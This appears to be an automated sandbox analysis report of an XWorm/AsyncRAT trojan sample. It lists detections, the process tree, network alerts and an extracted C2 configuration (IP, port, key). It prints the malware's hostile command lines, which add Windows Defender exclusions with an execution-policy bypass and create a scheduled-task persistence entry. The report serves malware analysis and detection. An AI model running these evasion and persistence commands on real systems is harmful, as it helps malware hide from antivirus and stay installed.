Windows Analysis Report
fjijTlM2tu.exe

Overview

General Information

Sample name: fjijTlM2tu.exe (renamed because original name is a hash value)
Original sample name: 929395b5d0f521c2a6b556a341da65343177a3edcc88862938d5a8cef166e93c.exe
Analysis ID: 1539518
MD5: 55107da03a7ee49d56320d0b43945691
SHA1: e8c75f1a39fec81a99e3c65c45f965b669286d59
SHA256: 929395b5d0f521c2a6b556a341da65343177a3edcc88862938d5a8cef166e93c
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • fjijTlM2tu.exe (PID: 6872 cmdline: "C:\Users\user\Desktop\fjijTlM2tu.exe" MD5: 55107DA03A7EE49D56320D0B43945691)
    • powershell.exe (PID: 4080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fjijTlM2tu.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'localsys64.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6556 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • localsys64.exe (PID: 6428 cmdline: C:\Users\user\AppData\Roaming\localsys64.exe MD5: 55107DA03A7EE49D56320D0B43945691)
  • localsys64.exe (PID: 6112 cmdline: "C:\Users\user\AppData\Roaming\localsys64.exe" MD5: 55107DA03A7EE49D56320D0B43945691)
  • localsys64.exe (PID: 4600 cmdline: "C:\Users\user\AppData\Roaming\localsys64.exe" MD5: 55107DA03A7EE49D56320D0B43945691)
  • cleanup
Malware configuration (XWorm): {"C2 url": ["147.185.221.22"], "Port": "43768", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings
fjijTlM2tu.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
fjijTlM2tu.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x86ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x876b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8880:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8346:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\localsys64.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\localsys64.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x86ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x876b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8880:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8346:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x84ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x856b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8680:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8146:$cnc4: POST / HTTP/1.1
00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xa18e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xa22b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xa340:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x9e06:$cnc4: POST / HTTP/1.1
Process Memory Space: fjijTlM2tu.exe PID: 6872 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x86ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x876b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8880:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8346:$cnc4: POST / HTTP/1.1
0.2.fjijTlM2tu.exe.12c69ac0.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.fjijTlM2tu.exe.12c69ac0.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x68ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x696b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6a80:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6546:$cnc4: POST / HTTP/1.1
0.0.fjijTlM2tu.exe.710000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fjijTlM2tu.exe", ParentImage: C:\Users\user\Desktop\fjijTlM2tu.exe, ParentProcessId: 6872, ParentProcessName: fjijTlM2tu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', ProcessId: 4080, ProcessName: powershell.exe
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fjijTlM2tu.exe", ParentImage: C:\Users\user\Desktop\fjijTlM2tu.exe, ParentProcessId: 6872, ParentProcessName: fjijTlM2tu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', ProcessId: 4080, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\localsys64.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\fjijTlM2tu.exe, ProcessId: 6872, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\localsys64
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\fjijTlM2tu.exe, ProcessId: 6872, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\localsys64.lnk
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\fjijTlM2tu.exe", ParentImage: C:\Users\user\Desktop\fjijTlM2tu.exe, ParentProcessId: 6872, ParentProcessName: fjijTlM2tu.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe", ProcessId: 6556, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fjijTlM2tu.exe", ParentImage: C:\Users\user\Desktop\fjijTlM2tu.exe, ParentProcessId: 6872, ParentProcessName: fjijTlM2tu.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe', ProcessId: 4080, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-22T19:31:00.614747+0200 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50013 | 147.185.221.22 | 43768 | TCP


AV Detection

Source: fjijTlM2tu.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\localsys64.exe, Avira: detection malicious, Label: TR/Spy.Gen
Source: fjijTlM2tu.exe, Malware Configuration Extractor: Xworm {"C2 url": ["147.185.221.22"], "Port": "43768", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Roaming\localsys64.exe, ReversingLabs: Detection: 78%
Source: fjijTlM2tu.exe, ReversingLabs: Detection: 78%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Roaming\localsys64.exe, Joe Sandbox ML: detected
Source: fjijTlM2tu.exe, Joe Sandbox ML: detected
Source: fjijTlM2tu.exe, String decryptor: 147.185.221.22
Source: fjijTlM2tu.exe, String decryptor: 43768
Source: fjijTlM2tu.exe, String decryptor: <123456789>
Source: fjijTlM2tu.exe, String decryptor: <Xwormmm>
Source: fjijTlM2tu.exe, String decryptor: sigma
Source: fjijTlM2tu.exe, String decryptor: USB.exe
Source: fjijTlM2tu.exe, String decryptor: %AppData%
Source: fjijTlM2tu.exe, String decryptor: localsys64.exe
Source: fjijTlM2tu.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: fjijTlM2tu.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic, Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:50013 -> 147.185.221.22:43768
Source: Malware configuration extractor, URLs: 147.185.221.22
Source: global traffic, TCP traffic: 147.185.221.22 ports 43768,3,4,6,7,8
Source: global traffic, TCP traffic: 192.168.2.4:49759 -> 147.185.221.22:43768
Source: Joe Sandbox View, IP Address: 147.185.221.22
Source: Joe Sandbox View, ASN Name: SALSGIVERUS
Source: unknown, TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: powershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222011806.00000206296AE000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2222011806.00000206296AE000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000001.00000002.1750379814.000002AFA5FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1843905928.000001FCB52D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1992420947.0000020590071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1729265140.000002AF96159000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.000002058022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: fjijTlM2tu.exe, 00000000.00000002.2908372278.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1729265140.000002AF95F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.0000020611291000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1729265140.000002AF96159000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.000002058022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1856423064.000001FCBD850000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000001.00000002.1729265140.000002AF95F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1789759074.000001FCA5261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1885697345.0000020580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2064061675.0000020611291000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2064061675.00000206114BA000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1750379814.000002AFA5FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1843905928.000001FCB52D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1992420947.0000020590071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2196471527.00000206212FF000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: fjijTlM2tu.exe, XLogger.cs, .Net Code: KeyboardLayout
Source: localsys64.exe.0.dr, XLogger.cs, .Net Code: KeyboardLayout
Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, XLogger.cs, .Net Code: KeyboardLayout

Operating System Destruction

Source: C:\Users\user\Desktop\fjijTlM2tu.exe, Process information set: 01 00 00 00

System Summary

Source: fjijTlM2tu.exe, type: SAMPLE, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.fjijTlM2tu.exe.710000.0.unpack, type: UNPACKEDPE, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\localsys64.exe, type: DROPPED, Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\fjijTlM2tu.exe, Code function: 0_2_00007FFD9B8812C9
Source: C:\Users\user\Desktop\fjijTlM2tu.exe, Code function: 0_2_00007FFD9B889E12
Source: C:\Users\user\Desktop\fjijTlM2tu.exe, Code function: 0_2_00007FFD9B889066
Source: C:\Users\user\Desktop\fjijTlM2tu.exe, Code function: 0_2_00007FFD9B881C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_00007FFD9B9830E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 4_2_00007FFD9B9530E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 11_2_00007FFD9B962E11
Source: C:\Users\user\AppData\Roaming\localsys64.exe, Code function: 16_2_00007FFD9B871558
Source: C:\Users\user\AppData\Roaming\localsys64.exe, Code function: 17_2_00007FFD9B8A12C9
Source: C:\Users\user\AppData\Roaming\localsys64.exe, Code function: 17_2_00007FFD9B8A1C5D
Source: C:\Users\user\AppData\Roaming\localsys64.exe, Code function: 18_2_00007FFD9B8812C9
Source: C:\Users\user\AppData\Roaming\localsys64.exe, Code function: 18_2_00007FFD9B881C5D
Source: fjijTlM2tu.exe, 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamecargame.exe4 vs fjijTlM2tu.exe
Source: fjijTlM2tu.exe, 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamecargame.exe4 vs fjijTlM2tu.exe
Source: fjijTlM2tu.exe, Binary or memory string: OriginalFilenamecargame.exe4 vs fjijTlM2tu.exe
Source: fjijTlM2tu.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: fjijTlM2tu.exe, type: SAMPLE, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.fjijTlM2tu.exe.710000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\localsys64.exe, type: DROPPED, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: fjijTlM2tu.exe, Helper.cs, Cryptographic APIs: 'TransformFinalBlock'
                  Source: fjijTlM2tu.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: fjijTlM2tu.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: localsys64.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: localsys64.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: localsys64.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: fjijTlM2tu.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: fjijTlM2tu.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: localsys64.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: localsys64.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/21@0/1
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile created: C:\Users\user\AppData\Roaming\localsys64.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeMutant created: \Sessions\1\BaseNamedObjects\04UEOrkCj8I1qdBg
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
